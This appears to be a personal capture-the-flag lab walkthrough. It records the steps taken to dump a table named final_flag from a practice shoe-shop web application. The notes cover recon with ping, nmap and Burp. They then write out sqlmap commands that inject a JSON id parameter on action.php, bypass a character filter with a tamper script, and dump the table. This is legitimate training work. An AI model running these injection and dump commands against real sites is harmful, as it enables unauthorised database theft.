- Find the contents of table final_flag - Ping test![[images/Pasted image 20251210193224.png]] - Nmap scan![[images/Pasted image 20251210193220.png]] - Visit web page - Shoe web sales![[images/Pasted image 20251210193457.png]] - View request and response in Burp ![[images/Pasted image 20251210193516.png]] - `/checkout.html` appears to have a web form![[images/Pasted image 20251210193951.png]] - let's try sqlmap here > failure ```bash sqlmap -u "http://83.136.251.11:49018/checkout.html" --batch ``` ![[images/Pasted image 20251210193934.png]] - hunt for forms across different pages with variations of the below ```bash sqlmap -u "http://83.136.251.11:49018/blog-single.html" --forms --crawl=1 ``` - potential forms ```bash GET http://83.136.251.11:49018/checkout.html?=&optradio=on POST http://83.136.251.11:49018/shop.html POST data: people=%23&people=%23 ``` - try adding an item to cart from /shop.html - interesting pop-up ![[images/Pasted image 20251210200411.png]] - burp shows a POST request targeting `action.php` with an `id` parameter ![[images/Pasted image 20251210200502.png]] - send the POST request to a file within Burp to use with `sqlmap` - try starter command with above file - JSON id parameter appears to be dynamic - We know it is JSON based on the `{key:value}` format in the POST request above - `>` character being filtered out by back-end server ```bash sqlmap -r shop-post.txt ``` ![[images/Pasted image 20251210201411.png]] - try more advanced command targeting specified table - add specialized `--data` field for JSON payload - add bypass due to above-noted filtering ```bash sqlmap -r shop-post.txt --method POST --data '{"id":"1"}' --batch --dump --tamper=between -T final_flag ``` ![[images/Pasted image 20251210202030.png]]